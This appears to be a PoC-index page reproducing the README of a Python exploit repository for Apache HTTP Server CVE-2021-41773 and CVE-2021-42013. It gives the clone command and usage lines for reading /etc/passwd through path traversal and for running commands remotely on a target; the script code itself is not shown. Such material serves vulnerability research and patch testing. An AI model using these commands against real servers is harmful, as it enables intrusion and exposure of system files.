CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源

关联漏洞

Description

Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)

介绍

# Apache-CVEs
Exploit created in python3 to exploit known vulnerabilities in Apache web server (CVE-2021-41773, CVE-2021-42013)

## What's apache

The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

## Version Affected

- CVE-2021-41773 -> 2.4.49
- CVE-2021-42013 -> 2.4.50

# How to install

Just do a git clone:

```
git clone https://github.com/0xGabe/Apache-CVEs
```

# CVE-2021-41773

## How to use

### Path traversal

To read the desired file, just pass the file path, if the user does not have permission to read, there will be no reading result.

```
python3 cve-2021-41773.py --url http://HOST:PORT --path /etc/passwd
```

### Remote Command Execution

To execute commands with spaces, special characters or the like on the target machine, it is necessary to pass the command in quotes.

```
python3 cve-2021-41773.py --url http://HOST:PORT --cmd id
```

# CVE-2021-42013

## How to use

### Path traversal

To read the desired file, just pass the file path, if the user does not have permission to read, there will be no reading result.

```
python3 cve-2021-42013.py --url http://HOST:PORT --path /etc/passwd
```

### Remote Command Execution

To execute commands with spaces, special characters or the like on the target machine, it is necessary to pass the command in quotes.

```
python3 cve-2021-42013.py --url http://HOST:PORT --cmd id
```

文件快照

 [4.0K]  /data/pocs/5cd6cf06ded9bc83e6d14d832bf866d1ea2e6005
├── [2.6K]  cve-2021-41773.py
├── [2.6K]  cve-2021-42013.py
├── [1.0K]  LICENSE
└── [1.6K]  README.md

0 directories, 4 files

备注